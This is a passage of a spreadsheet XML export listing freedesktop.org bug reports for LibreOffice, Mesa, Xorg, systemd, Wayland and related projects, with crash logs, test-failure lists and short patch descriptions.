first_error.jpg and second_error.jpg.
The bug is when I double-clik on this network file and change the content the firs_error.jpg appears two times and the second_error.jpg appears one time.
I think the problem come from this commit:
http://cgit.freedesktop.org/libreoffice/core/commit/?id=6523f78456c9f78fb842b7215eb84a96f4e92472&amp;h=libreoffice-4-0-5
In found a backport here which it worked and solved the problem:
http://cgit.freedesktop.org/libreoffice/core/commit/sfx2/source/doc/docfile.cxx?h=libreoffice-4-1-2&amp;id=0c2206081de38a41597aadfb2255540d6308be63
Can you backport the commit for the 4.0.6 rc2 or the final 4.0.6?
It's very important
Thanks.</t>
  </si>
  <si>
    <t>matthieu.gay</t>
  </si>
  <si>
    <t>MESA-88207</t>
  </si>
  <si>
    <t>[hsw] GPU HANG: ecode 0:0x84dfbffe in cubestorm [28178] reason: Ring hung action: reset</t>
  </si>
  <si>
    <t>Created attachment 111965
i915_error_state
Jan  8 16:31:37 t44 kernel: [53157.198509] [drm] stuck on render ring
Jan  8 16:31:37 t44 kernel: [53157.200517] [drm] GPU HANG: ecode 0:0x84dfbffe in cubestorm [28178] reason: Ring hung action: reset
Jan  8 16:31:37 t44 kernel: [53157.200525] [drm] GPU hangs can indicate a bug anywhere in the entire gfx stack including userspace.
Jan  8 16:31:37 t44 kernel: [53157.200530] [drm] Please file a _new_ bug report on bugs.freedesktop.org against DRI -&gt; DRM/Intel
Jan  8 16:31:37 t44 kernel: [53157.200535] [drm] drm/i915 developers can then reassign to the right component if it's not a kernel issue.
Jan  8 16:31:37 t44 kernel: [53157.200540] [drm] The gpu crash dump is required to analyze gpu hangs so please always attach it.
Jan  8 16:31:37 t44 kernel: [53157.200546] [drm] GPU crash dump saved to /sys/class/drm/card0/error
Jan  8 16:31:43 t44 kernel: [53163.197060] [drm] stuck on render ring
Jan  8 16:31:43 t44 kernel: [53163.198133] [drm] GPU HANG: ecode 0:0x84dfbffe in cubestorm [28178] reason: Ring hung action: reset</t>
  </si>
  <si>
    <t>LIBREOFFICE-61516</t>
  </si>
  <si>
    <t>FEAT_FSYS_DOUBLESPEED removal ...</t>
  </si>
  <si>
    <t>It appears we define this macro in tools un-conditionally we should remove it and the #ifdef / #endif lines that refer to it - now that would be a Feat :-)
Thanks ! :-)</t>
  </si>
  <si>
    <t>FONTCONFIG-7754</t>
  </si>
  <si>
    <t>#warning is not portable</t>
  </si>
  <si>
    <t>#warning is a feature of gcc. It's not standard C.
That's why fcfreetype.c does not compile with the standard HP-UX 11 compiler:
 4052: Unknown preprocessing directive.
It does not compile with MIPSpro 7.7.4 or with the SunOS 5.6 compiler either.</t>
  </si>
  <si>
    <t>j.abt</t>
  </si>
  <si>
    <t>XORG-17358</t>
  </si>
  <si>
    <t>server stuck in damageDestroyPixmap</t>
  </si>
  <si>
    <t>Created attachment 18583
gdb backtrace
From times to times (around once a week maybe more) the server just stop
responding when a window is closed.
gdb from remote session shows that the server is spinning forever in damageDestroyPixmap:
        while ((pDamage = *pPrev))
        {
            damageRemoveDamage (pPrev pDamage)
            if (!pDamage-&gt;isWindow)
                DamageDestroy (pDamage)
        }
the graphic stack is a git master checkout from 26 August 2008
using the radeon driver and compiz.
a gdb bt full backtrace is attached.</t>
  </si>
  <si>
    <t>XORG-61733</t>
  </si>
  <si>
    <t>sse4.1 sse4.2 not detected</t>
  </si>
  <si>
    <t>My CPU supports sse4.1 and sse4.2 but driver from git doesn't detect it
CPU: x86-64 sse2 sse3 ssse3</t>
  </si>
  <si>
    <t>js314592</t>
  </si>
  <si>
    <t>SPICE-28088</t>
  </si>
  <si>
    <t>video streaming on non-primary surfaces is not handled correctly</t>
  </si>
  <si>
    <t>1) The video streaming identification ignores the surface id.
2) all the streams are drawn on the primary surface even if they do not belong to it.</t>
  </si>
  <si>
    <t>MESA-31830</t>
  </si>
  <si>
    <t>[bisected] broken shadows in Unigine Sanctuary and Lightsmark</t>
  </si>
  <si>
    <t>Created attachment 40467
screenshot
With latest mesa git shadows in Unigine are broken again. This is with shaders set to low or medium (high works fine).
commit 8833f53e659e079e7ab74bb9197f9b44b1eeefe0
Author: Tom Stellard 
Date:   Wed Nov 10 21:34:18 2010 -0800
    r300/compiler: Enable rename_reg pass for r500 cards
    In addition the rename_reg pass has been rewritten to use
    rc_get_readers().
Workaround is RADEON_DEBUG=noopt.</t>
  </si>
  <si>
    <t>DRI-28840</t>
  </si>
  <si>
    <t>[regression] kernel ooops in i915_gem_do_execbuffer when run urbanterror</t>
  </si>
  <si>
    <t>Created attachment 36622
xorg.0.log
System Environment:
--------------------------
Arch:          i386
Platform:      pineview
Libdrm:         (master)726210f87d558d558022f35bc8c839e798a19f0c
Mesa:           (master)006d02a91108971f52b231b83504bad9a25fadf8
Xserver:        (master)xorg-server-1.8.99.903
Xf86_video_intel:      (master)17884af4eda01c05e7429ed6a195f3e4ceeff892
Kernel: v2.6.35-rc2
Bug detailed description:
-------------------------
The phoronix test case urbanterror run on Pineview will have a kernel ooops and the gpu is also hang with the newest kernel(v2.6.35-rc2). It works well with v2.6.35-rc1. And it works well on Piketon.  
Its output on screen is 
Message from syslogd@x-pnv2 at Jun 30 14:40:00 ...
 kernel:Oops: 0000 [#1] SMP
Message from syslogd@x-pnv2 at Jun 30 14:40:00 ...
 kernel:last sysfs file: /sys/devices/LNXSYSTM:00/LNXSYBUS:00/PNP0A08:00/device:01/PNP0C09:00/PNP0C0A:00/power_supply/BAT1/present
Message from syslogd@x-pnv2 at Jun 30 14:40:00 ...
 kernel:Process ioUrbanTerror.i (pid: 1994 ti=f5fba000 task=f5e71900 task.ti=f5fba000)
Message from syslogd@x-pnv2 at Jun 30 14:40:00 ...
 kernel:Stack:
Message from syslogd@x-pnv2 at Jun 30 14:40:00 ...
 kernel:Call Trace:
Message from syslogd@x-pnv2 at Jun 30 14:40:00 ...
 kernel:Code: 45 d4 eb 4e 8b 55 a4 8b 04 b2 8b 50 50 8b 40 38 c7 85 6c ff ff ff 00 00 00 00 89 85 68 ff ff ff 8b 45 c0 f6 40 20 01 74 0f 31 c0  42 69 30 0f 95 c0 89 85 6c ff ff ff 8b 85 68 ff ff ff 31 d2
Message from syslogd@x-pnv2 at Jun 30 14:40:00 ...
 kernel:EIP: [] i915_gem_do_execbuffer+0x867/0xe24 [i915] SS:ESP 0068:f5fbbd98
Message from syslogd@x-pnv2 at Jun 30 14:40:00 ...
 kernel:CR2: 0000000000000069
Reproduce steps:
----------------
1. xinit &amp; 
2. phoronix-test-suite run urbanterror</t>
  </si>
  <si>
    <t>SYSTEMD-87020</t>
  </si>
  <si>
    <t>man systemd refers to obsolete command 'systemctl dump'</t>
  </si>
  <si>
    <t xml:space="preserve">Hi
Forwarding a bug from debian: the systemd manpage refers to obsolete command `systemclt dump`.
I believe the command should be `systemd-analyze dump`.
diff --git a/man/systemd.xml b/man/systemd.xml
index d776815..e0e8d37 100644
--- a/man/systemd.xml
+++ b/man/systemd.xml
@@ -6817 +6817 @@
                                 received the systemd manager will log
                                 its complete state in human readable
                                 form. The data logged is the same as
-                                printed by systemctl
+                                printed by systemd-analyze
                                 dump.
                         </t>
  </si>
  <si>
    <t>SYSTEMD-78082</t>
  </si>
  <si>
    <t>dhcp-packet.c: UDP checksum calculation on Big Endian systems invalid ?</t>
  </si>
  <si>
    <t>It seems the algorithm in dhcp_packet_checksum produced invalid checksums on BE systems (e.g. Powerpc).
I guess from other implementations the overflow part of the algorithm is the cause.
Yet this produces invalid UDP packets on Big endian machines.</t>
  </si>
  <si>
    <t>th.ritter</t>
  </si>
  <si>
    <t>WAYLAND-101557</t>
  </si>
  <si>
    <t>libinput fails to compile on systems without restorecon</t>
  </si>
  <si>
    <t>I get this debug output trying to compile libinput now on a debian system that does not have restorecon
ninja: Entering directory `build'
[0/1] Installing files.
Restoring SELinux context on //opt/lib/i386-linux-gnu/libinput.so.10.13.0
/srcbuild/libinput/src/libinput-restore-selinux-context.sh: 10: /srcbuild/libinput/src/libinput-restore-selinux-context.sh: restorecon: not found</t>
  </si>
  <si>
    <t>bluescreen_avenger</t>
  </si>
  <si>
    <t>XORG-22827</t>
  </si>
  <si>
    <t>X crashes after upgrade.</t>
  </si>
  <si>
    <t>I upgraded my slackware to the current version (current ver from Thu Jul 16 19:25:26 CDT 2009) 
Now when I try to run 'gkrellm -s remote_host_ip' I getting total X crash (X reset to the login window).
this line occur when I try to run gkrellm with '-s' option:
X: pixman-region.c:1113: pixman_region_intersect: Assertion `pixman_region_selfcheck (reg1)' failed.
Before this update all were fine (my previous slackware current update was from Sat Jul 11 18:31:32 CDT 2009)
Logs xorg conf in attachment.
software:
pixman-0.15.16
xorg-server-1.6.2
Greetings</t>
  </si>
  <si>
    <t>pgriffais</t>
  </si>
  <si>
    <t>tomekk</t>
  </si>
  <si>
    <t>XORG-12600</t>
  </si>
  <si>
    <t>off-by one in catalogue.c</t>
  </si>
  <si>
    <t>Date: Fri 21 Sep 2007 23:28:43 +0200
From: Joerg Sonnenberger 
To: xorg_security@x.org
Subject: Off-by-one in libXfont-1.3.1
Hi
the update from libXfont-1.3.0 to 1.3.1 changed catalogue.c to
NUL-terminate the buffer passed to readlink. This is not correct if
readlink writes exactly sizeof dest bytes as it writes exactly one byte
after the limit. The old code was not vulnerable as it copied to a newly
allocated buffer of the right size.
This code should be somewhat reorganised to use asprintf/snprintf and
making it a lot more readable but that is a visual matter independent
of the actual issue.</t>
  </si>
  <si>
    <t>XORG-23735</t>
  </si>
  <si>
    <t>KMS Radeon - DDX not works on RS690</t>
  </si>
  <si>
    <t>Created attachment 29260
xorg.log
KMS is loaded fine only when I try run Xorg then it enter to endless loop 'changing resolution' or something until I press power on button... Then system shutdown X and fb work fine until is laptop switch off.
OS: Kubuntu karmic x86_64 + tested with git ddx.</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-85114</t>
  </si>
  <si>
    <t>Some patches regarding default</t>
  </si>
  <si>
    <t>ran234</t>
  </si>
  <si>
    <t>LIBREOFFICE-33746</t>
  </si>
  <si>
    <t>WIKIHELP LOCALHELP item Split Cells not valid for CALC</t>
  </si>
  <si>
    <t>Created attachment 42736
the help item
The help for Calc gives an explanation for dividing cells that only applies to Writer.
The attachment shows the dutch text I am sorry that I haven't been able to get the english version.</t>
  </si>
  <si>
    <t>MESA-102578</t>
  </si>
  <si>
    <t>[Vulkan CTS] crashes in some dEQP-VK.wsi.wayland.* tests</t>
  </si>
  <si>
    <t>Created attachment 134039
Valgrind output of dEQP-VK.wsi.wayland.incremental_present.scale_none.fifo.incremental_present
Mesa HEAD: 6d9d6071ee961acc82543b321764a0ffec8cd39a
Wayland HEAD: 3ea73cba0446886632cd24442203fda47cb3c220
Linux distro: Debian Testing
Vulkan CTS: any of vulkan-cts-1.0.2.6-rc* branches.
Testing Vulkan CTS I found segmentation faults on some tests under dEQP-VK.wsi.wayland.* category. Attached is a valgrind output of the execution of one of these tests.
deqp-vk/wsi/wayland/incremental_present/scale_none/fifo/reference:
crash
deqp-
vk/wsi/wayland/incremental_present/scale_none/fifo_relaxed/incremental_
present: crash
deqp-
vk/wsi/wayland/incremental_present/scale_none/fifo_relaxed/reference:
crash
deqp-
vk/wsi/wayland/incremental_present/scale_none/immediate/incremental_pre
sent: crash
deqp-vk/wsi/wayland/incremental_present/scale_none/immediate/reference: 
crash
deqp-
vk/wsi/wayland/incremental_present/scale_none/mailbox/incremental_prese
nt: crash
deqp-vk/wsi/wayland/incremental_present/scale_none/mailbox/reference:
crash
deqp-vk/wsi/wayland/surface/query_formats: crash
deqp-vk/wsi/wayland/surface/query_formats2: crash
deqp-vk/wsi/wayland/swapchain/create/clipped: crash
deqp-vk/wsi/wayland/swapchain/create/composite_alpha: crash
deqp-vk/wsi/wayland/swapchain/create/image_array_layers: crash
deqp-vk/wsi/wayland/swapchain/create/image_extent: crash
deqp-vk/wsi/wayland/swapchain/create/image_format: crash
deqp-vk/wsi/wayland/swapchain/create/image_sharing_mode: crash
deqp-vk/wsi/wayland/swapchain/create/image_usage: crash
deqp-vk/wsi/wayland/swapchain/create/min_image_count: crash
deqp-vk/wsi/wayland/swapchain/create/pre_transform: crash
deqp-vk/wsi/wayland/swapchain/create/present_mode: crash
deqp-vk/wsi/wayland/swapchain/get_images/incomplete: crash
deqp-vk/wsi/wayland/swapchain/modify/resize: crash
deqp-vk/wsi/wayland/swapchain/render/basic: crash
deqp-vk/wsi/wayland/swapchain/simulate_oom/clipped: crash
deqp-vk/wsi/wayland/swapchain/simulate_oom/composite_alpha: crash
deqp-vk/wsi/wayland/swapchain/simulate_oom/image_array_layers: crash
deqp-vk/wsi/wayland/swapchain/simulate_oom/image_extent: crash
deqp-vk/wsi/wayland/swapchain/simulate_oom/image_format: crash
deqp-vk/wsi/wayland/swapchain/simulate_oom/image_sharing_mode: crash
deqp-vk/wsi/wayland/swapchain/simulate_oom/image_usage: crash
deqp-vk/wsi/wayland/swapchain/simulate_oom/min_image_count: crash
deqp-vk/wsi/wayland/swapchain/simulate_oom/pre_transform: crash
deqp-vk/wsi/wayland/swapchain/simulate_oom/present_mode: crash</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-13488</t>
  </si>
  <si>
    <t>DRI Wiki Maintainance</t>
  </si>
  <si>
    <t>I need some assistance to migrate DRI wiki to Moin-1.6 beta. See the thread http://lists.freedesktop.org/archives/xorg/2007-November/030643.html for more context.
I already made a backup of all wiki content /srv/dri.freedesktop.org/moin I removed all dangling spam content from the data storage and I installed Moin-1.6 beta on /srv/dri.freedesktop.org/moin-1.6. The data storage format didn't change so the only thing necessary would be:
1. To replace the line
  PythonPath ['/srv/dri.freedesktop.org/moin']+sys.path
by
  PythonPath ['/srv/dri.freedesktop.org/moin''/srv/dri.freedesktop.org/moin-1.6/lib/python2.4/site-packages']+sys.path
to use the moin-1.6.
2. Replace /srv/dri.freedesktop.org/moin/wikiconfig.py by /srv/dri.freedesktop.org/moin/wikiconfig.py-for-moin-1.6 
3. Perhaps some more tweaking...</t>
  </si>
  <si>
    <t>SHARED-MIME-INFO-41989</t>
  </si>
  <si>
    <t>Add zz-application/zz-winassoc-{123cabdocmdbxls} aliases</t>
  </si>
  <si>
    <t>Created attachment 52517
Add zz-application/zz-winassoc-{123cabdocmdbxls} aliases
As discussed in bug 41286 (for desktop-file-utils) I think we should add zz-application/zz-winassoc-* aliases to shared-mime-info since those mime types are being used out there. It's all aliases for existing mime types so it's mostly a trivial change.</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-29961</t>
  </si>
  <si>
    <t>New project: LightDM</t>
  </si>
  <si>
    <t>My project (lightdm) is a new cross-desktop display manager.  It is currently in an alpha state.
There is growing interest in this project from groups such as Oracle XFCE and Ubuntu and we have a need for collaboration tools.
I would like to make use of the freedesktop wiki for design documentation and specification drafting.  Use the mailing lists for collaboration and feedback and the file upload space for making releases.  We would also like to make use of the freedesktop d-bus namespace.
I will be the project administrator.
Just one mailing list is required lightdm@lists.freedesktop.org.  I will be the list administrator.</t>
  </si>
  <si>
    <t>XDG-USER-DIRS-12146</t>
  </si>
  <si>
    <t>Updated Greek translation</t>
  </si>
  <si>
    <t>I attach the updated Greek translation. 
I am not sure if this is the correct way to send translations you may want to put some info at
http://l10n.gnome.org/module/xdg-user-dirs
as this is the place translators go through.</t>
  </si>
  <si>
    <t>LIBREOFFICE-60833</t>
  </si>
  <si>
    <t>EDITING: Terms added to dictionary are lost between editing sessions</t>
  </si>
  <si>
    <t>Problem description:
Adding an unknown word to the dictionary does not persist between LO close/open.
Steps to reproduce:
1. Right-click on unknown word Add-to dictionary
2. Exit
3. Reopen the deocument
Operating System: openSUSE
Version: 3.6.3.2 release</t>
  </si>
  <si>
    <t>rebel</t>
  </si>
  <si>
    <t>XORG-13522</t>
  </si>
  <si>
    <t>XInput Extension Memory Corruption Vulnerability</t>
  </si>
  <si>
    <t>TELEPATHY-36878</t>
  </si>
  <si>
    <t>Pidgin store not robust to empty file</t>
  </si>
  <si>
    <t>Created attachment 46376
Rob's crash log
Pidgin store crash trying to parse empty file. This was reported by Rob McQueen on IRC attaching his crash log.</t>
  </si>
  <si>
    <t>DRI-109530</t>
  </si>
  <si>
    <t>[CI][BAT] igt@gem_exec_suspend@basic-s3 - dmesg-warn - *ERROR* failed to enable link training</t>
  </si>
  <si>
    <t>https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_5519/fi-icl-y/igt@gem_exec_suspend@basic-s3.html
Dmesg-Warnings	
 [82.574927] [drm:intel_dp_start_link_train [i915]] *ERROR* failed to enable link training</t>
  </si>
  <si>
    <t>WAYLAND-104990</t>
  </si>
  <si>
    <t>XPS13 L322X touchpad laggy</t>
  </si>
  <si>
    <t>Hi
From there https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1746740
the touchpad frequently locks
This is with libinput10</t>
  </si>
  <si>
    <t>development</t>
  </si>
  <si>
    <t>f0rhum</t>
  </si>
  <si>
    <t>POPPLER-50748</t>
  </si>
  <si>
    <t>Postscript error undefined setoverprintmode from pdftops 0.20.0 output sent to HP LaserJet 4350</t>
  </si>
  <si>
    <t>I receive the following when printing (via CUPS) to an HP LaserJet 4350 (and other HP printers of a similar age):
ERROR: undefined
OFFENDING COMMAND: setoverprintmode setoverprintmode COMMAND TYPE: nametype
The 4350 has a level 3 postscript interpreter version 3010.107.  According to the following URL the setoverprintmode command was not introduced until version 3015.102:
http://partners.adobe.com/public/developer/en/ps/sdk/5145overprint.pdf</t>
  </si>
  <si>
    <t>bowman+freedesktop</t>
  </si>
  <si>
    <t>MESA-5409</t>
  </si>
  <si>
    <t>Darwin 'cp' does not support -d flag in installmesa.</t>
  </si>
  <si>
    <t>Like FreeBSD cp on Darwin platforms also does not support the -d flag. The
solution is to use -d if uname is Darwin in addition to FreeBSD. Sorry no
patch. It looks like a small change and I am not handy with sh.</t>
  </si>
  <si>
    <t>b5901</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-3790</t>
  </si>
  <si>
    <t>add latvian xkb layout with aphostrophee dead key</t>
  </si>
  <si>
    <t>There is a need to add latvian keyboard layout with aphostrophee 'dead key' as
another alternative to lv (latvian with right-alt) xkb layout</t>
  </si>
  <si>
    <t>gatis.spats</t>
  </si>
  <si>
    <t>DRI-7971</t>
  </si>
  <si>
    <t>radeon driver unable to claim hw lock from abusive dri clients</t>
  </si>
  <si>
    <t>Demonstration code:
LOCK_HARDWARE(radeon)
sleep(60*60)
UNLOCK_HARDWARE(radeon)</t>
  </si>
  <si>
    <t>DRI-22126</t>
  </si>
  <si>
    <t>[855GM KMS] freezes on suspend to RAM</t>
  </si>
  <si>
    <t>Created attachment 26499
Generated after shutting down X rmmod i915 modprobe i915 modeset=1
It's a pure kernel problem present up to 2.6.30-rc8.  It's 100% reproducible on my ThinkPad R50e like the following:
 1. Boot with break=top so initramfs gives a prompt without doing anything.
 2. modprobe intel_agp
 3. modprobe i915 modeset=1
Kernel messages this far:
Linux agpgart interface v0.103
agpgart-intel 0000:00:00.0: Intel 855GM Chipset
agpgart-intel 0000:00:00.0: detected 8060K stolen memory
agpgart-intel 0000:00:00.0: AGP aperture is 128M @ 0xe0000000
input: Video Bus as /class/input/input1
ACPI: Video Device [VID] (multi-head: yes  rom: no  post: no)
[drm] Initialized drm 1.1.0 20060810
i915 0000:00:02.0: power state changed by ACPI to D0
i915 0000:00:02.0: PCI INT A -&gt; Link[LNKA] -&gt; GSI 11 (level low) -&gt; IRQ 11
i915 0000:00:02.0: setting latency timer to 64
i2c-adapter i2c-1: unable to read EDID block.
i915 0000:00:02.0: LVDS-1: no EDID data
i2c-adapter i2c-0: unable to read EDID block.
i915 0000:00:02.0: VGA-1: no EDID data
i2c-adapter i2c-1: unable to read EDID block.
i915 0000:00:02.0: LVDS-1: no EDID data
allocated 1024x768 fb: 0x007ff000 bo df31b840
Console: switching to colour frame buffer device 128x48
[drm] LVDS-8: set mode 1024x768 a
fb0: inteldrmfb frame buffer device
registered panic notifier
[drm] Initialized i915 1.6.0 20080730 for 0000:00:02.0 on minor 0
 5. echo mem &gt;/sys/power/state
Instead of powering off the machine freezes hard with (I'm running with no_console_suspend to get some output):
Freezing user space processes ... (elapsed 0.00 seconds) done.
Freezing remaining freezable tasks ... (elapsed 0.00 seconds) done.
[drm:i915_get_vblank_counter] *ERROR* trying to get vblank count for disabled pipe 0
i915 0000:00:02.0: PCI INT A disabled
(A picture of such a freeze with more modules loaded is available from
http://apt.niif.hu/ram_2.6.30-rc7.jpg)
If i don't use the modeset=1 parameter the system suspends and resumes all right even from X.  Suspend to disk works equally well with or without KMS.</t>
  </si>
  <si>
    <t>wferi</t>
  </si>
  <si>
    <t>SYSTEMD-87732</t>
  </si>
  <si>
    <t>nspawn catches kill signal only when using jenkins</t>
  </si>
  <si>
    <t>When running 217 on arch linux everything works exactly as expected but after upgrading to 218 nspawn will always report Container root terminated by signal KILL. when it is run by jenkins but if I run it with the exact same environment through ssh it succeeds. I've been trying all day to find a way to reproduce the issues outside of jenkins but I have been unable to.
The exact task I'm trying to do is build packages for arch linux using the mkchrootpkg command provided by the arch devtools which in turn uses systemd-nspawn in order to create a clean environment for building the package in.
I've tried
217: Works
218: Does not work
master: Does not work
I'm going to try bisecting but I'd appreciate if anyone has any better ideas about what could be causing this.</t>
  </si>
  <si>
    <t>joel</t>
  </si>
  <si>
    <t>LIBREOFFICE-80436</t>
  </si>
  <si>
    <t>LOCALHELP: write help pages for MODE.SNGL MODE.MULT NEGBINOM.DIST and Z.TEST spreadsheet functions</t>
  </si>
  <si>
    <t>Write help page for
MODE.SNGL MODE.MULT NEGBINOM.DIST and Z.TEST spreadsheet functions</t>
  </si>
  <si>
    <t>LIBREOFFICE-43479</t>
  </si>
  <si>
    <t>LibreOffice Base crashes when connected to Spreadsheet when SELECT DISTINCT used</t>
  </si>
  <si>
    <t>Created attachment 54084
Example spreadsheet and database to demonstrate bug
Any time LibreOffice Base is connected to a spreadsheet or .CSV file as its data source if you perform any SQL query that has DISTINCT in it it will crash the program.
The attached example database (SelectDistinctBug.odb) connects to the spreadsheet Sample.ods.  In the database is a query called Sample that will consistently crash LibreOffice if it is run.</t>
  </si>
  <si>
    <t>LIBREOFFICE-78313</t>
  </si>
  <si>
    <t>FILEOPEN: RTF font colors not retained</t>
  </si>
  <si>
    <t>Created attachment 98518
shows how it looks before saving the file and after opening it please only focus on the color change
I downloaded the .docx file found at  and opened it in LibO and then saved it as a rtf file. Then i reopened the saved file and the font colors arent retained as the second line is supposed to be blue and the third line is supposed to be grey. This is a regression in only the 4.2 and word 2010 opened the rtf file with colors intact.
This is the color bug mentioned in bug 77979.</t>
  </si>
  <si>
    <t>XORG-15345</t>
  </si>
  <si>
    <t>pattern origin when falling back to tiling</t>
  </si>
  <si>
    <t>Created attachment 15663
Patch fixing pattern origin computation
The computation of the pattern origin in exaRender is incorrect
when falling back to path for core render tiles.
The TSOrigin in a GC is the point *in the destination* corresponding
to (00) in the source not the point in the source corresponding to
(00) in the destination.
Attached patch fixes.</t>
  </si>
  <si>
    <t>MESA-108113</t>
  </si>
  <si>
    <t>[vulkancts] r32g32b32 transfer operations not implemented</t>
  </si>
  <si>
    <t>r32g32b32 is a nasty format we only support sampling linear textures from it no image stores or color attachment.
commit d294898f8e66ef5664b7a63356ca263bb14d2bef
Author: Jason Ekstrand 
Date:   Fri Jul 20 17:30:42 2018 -0700
    dEQP-VK: Add tests for blitting to/from linear images
    New Tests:
    dEQP-VK.api.copy_and_blit.core.blit_image.all_formats.color.*.linear_*_*
    dEQP-VK.api.copy_and_blit.core.blit_image.all_formats.color.*.*_linear_*
    Components: Vulkan
    Change-Id: I6457959e805b57cb088b23753c21910ef22f4061
added some failing tests.
Failing tests on Vega:
dEQP-VK.api.image_clearing.core.clear_color_image.1d.linear.multiple_layers.r32g32b32_sfloatFail
dEQP-VK.api.image_clearing.core.clear_color_image.1d.linear.multiple_layers.r32g32b32_sintFail
dEQP-VK.api.image_clearing.core.clear_color_image.1d.linear.multiple_layers.r32g32b32_uintFail
dEQP-VK.api.image_clearing.core.clear_color_image.1d.linear.remaining_array_layers.r32g32b32_sfloatFail
dEQP-VK.api.image_clearing.core.clear_color_image.1d.linear.remaining_array_layers.r32g32b32_sintFail
dEQP-VK.api.image_clearing.core.clear_color_image.1d.linear.remaining_array_layers.r32g32b32_uintFail
dEQP-VK.api.image_clearing.core.clear_color_image.1d.linear.remaining_array_layers_twostep.r32g32b32_sfloatFail
dEQP-VK.api.image_clearing.core.clear_color_image.1d.linear.remaining_array_layers_twostep.r32g32b32_sintFail
dEQP-VK.api.image_clearing.core.clear_color_image.1d.linear.remaining_array_layers_twostep.r32g32b32_uintFail
dEQP-VK.api.image_clearing.core.clear_color_image.1d.linear.single_layer.r32g32b32_sfloatFail
dEQP-VK.api.image_clearing.core.clear_color_image.1d.linear.single_layer.r32g32b32_sintFail
dEQP-VK.api.image_clearing.core.clear_color_image.1d.linear.single_layer.r32g32b32_uintFail
dEQP-VK.api.image_clearing.core.clear_color_image.2d.linear.multiple_layers.r32g32b32_sfloatFail
dEQP-VK.api.image_clearing.core.clear_color_image.2d.linear.multiple_layers.r32g32b32_sintFail
dEQP-VK.api.image_clearing.core.clear_color_image.2d.linear.multiple_layers.r32g32b32_uintFail
dEQP-VK.api.image_clearing.core.clear_color_image.2d.linear.remaining_array_layers.r32g32b32_sfloatFail
dEQP-VK.api.image_clearing.core.clear_color_image.2d.linear.remaining_array_layers.r32g32b32_sintFail
dEQP-VK.api.image_clearing.core.clear_color_image.2d.linear.remaining_array_layers.r32g32b32_uintFail
dEQP-VK.api.image_clearing.core.clear_color_image.2d.linear.remaining_array_layers_twostep.r32g32b32_sfloatFail
dEQP-VK.api.image_clearing.core.clear_color_image.2d.linear.remaining_array_layers_twostep.r32g32b32_sintFail
dEQP-VK.api.image_clearing.core.clear_color_image.2d.linear.remaining_array_layers_twostep.r32g32b32_uintFail
dEQP-VK.api.image_clearing.core.clear_color_image.2d.linear.single_layer.r32g32b32_sfloatFail
dEQP-VK.api.image_clearing.core.clear_color_image.2d.linear.single_layer.r32g32b32_sintFail
dEQP-VK.api.image_clearing.core.clear_color_image.2d.linear.single_layer.r32g32b32_uintFail
dEQP-VK.api.image_clearing.core.clear_color_image.3d.linear.single_layer.r32g32b32_sfloatFail
dEQP-VK.api.image_clearing.core.clear_color_image.3d.linear.single_layer.r32g32b32_sintFail
dEQP-VK.api.image_clearing.core.clear_color_image.3d.linear.single_layer.r32g32b32_uintFail
dEQP-VK.api.image_clearing.dedicated_allocation.clear_color_image.1d.linear.multiple_layers.r32g32b32_sfloatFail
dEQP-VK.api.image_clearing.dedicated_allocation.clear_color_image.1d.linear.multiple_layers.r32g32b32_sintFail
dEQP-VK.api.image_clearing.dedicated_allocation.clear_color_image.1d.linear.multiple_layers.r32g32b32_uintFail
dEQP-VK.api.image_clearing.dedicated_allocation.clear_color_image.1d.linear.remaining_array_layers.r32g32b32_sfloatFail
dEQP-VK.api.image_clearing.dedicated_allocation.clear_color_image.1d.linear.remaining_array_layers.r32g32b32_sintFail
dEQP-VK.api.image_clearing.dedicated_allocation.clear_color_image.1d.linear.remaining_array_layers.r32g32b32_uintFail
dEQP-VK.api.image_clearing.dedicated_allocation.clear_color_image.1d.linear.remaining_array_layers_twostep.r32g32b32_sfloatFail
dEQP-VK.api.image_clearing.dedicated_allocation.clear_color_image.1d.linear.remaining_array_layers_twostep.r32g32b32_sintFail
dEQP-VK.api.image_clearing.dedicated_allocation.clear_color_image.1d.linear.remaining_array_layers_twostep.r32g32b32_uintFail
dEQP-VK.api.image_clearing.dedicated_allocation.clear_color_image.1d.linear.single_layer.r32g32b32_sfloatFail
dEQP-VK.api.image_clearing.dedicated_allocation.clear_color_image.1d.linear.single_layer.r32g32b32_sintFail
dEQP-VK.api.image_clearing.dedicated_allocation.clear_color_image.1d.linear.single_layer.r32g32b32_uintFail
dEQP-VK.api.image_clearing.dedicated_allocation.clear_color_image.2d.linear.multiple_layers.r32g32b32_sfloatFail
dEQP-VK.api.image_clearing.dedicated_allocation.clear_color_image.2d.linear.multiple_layers.r32g32b32_sintFail
dEQP-VK.api.image_clearing.dedicated_allocation.clear_color_image.2d.linear.multiple_layers.r32g32b32_uintFail
dEQP-VK.api.image_clearing.dedicated_allocation.clear_color_image.2d.linear.remaining_array_layers.r32g32b32_sfloatFail
dEQP-VK.api.image_clearing.dedicated_allocation.clear_color_image.2d.linear.remaining_array_layers.r32g32b32_sintFail
dEQP-VK.api.image_clearing.dedicated_allocation.clear_color_image.2d.linear.remaining_array_layers.r32g32b32_uintFail
dEQP-VK.api.image_clearing.dedicated_allocation.clear_color_image.2d.linear.remaining_array_layers_twostep.r32g32b32_sfloatFail
dEQP-VK.api.image_clearing.dedicated_allocation.clear_color_image.2d.linear.remaining_array_layers_twostep.r32g32b32_sintFail
dEQP-VK.api.image_clearing.dedicated_allocation.clear_color_image.2d.linear.remaining_array_layers_twostep.r32g32b32_uintFail
dEQP-VK.api.image_clearing.dedicated_allocation.clear_color_image.2d.linear.single_layer.r32g32b32_sfloatFail
dEQP-VK.api.image_clearing.dedicated_allocation.clear_color_image.2d.linear.single_layer.r32g32b32_sintFail
dEQP-VK.api.image_clearing.dedicated_allocation.clear_color_image.2d.linear.single_layer.r32g32b32_uintFail
dEQP-VK.api.image_clearing.dedicated_allocation.clear_color_image.3d.linear.single_layer.r32g32b32_sfloatFail
dEQP-VK.api.image_clearing.dedicated_allocation.clear_color_image.3d.linear.single_layer.r32g32b32_sintFail
dEQP-VK.api.image_clearing.dedicated_allocation.clear_color_image.3d.linear.single_layer.r32g32b32_uintFail</t>
  </si>
  <si>
    <t>LIBREOFFICE-44983</t>
  </si>
  <si>
    <t>FILEOPEN RTF import of \paperh has no effect without \pghsxn</t>
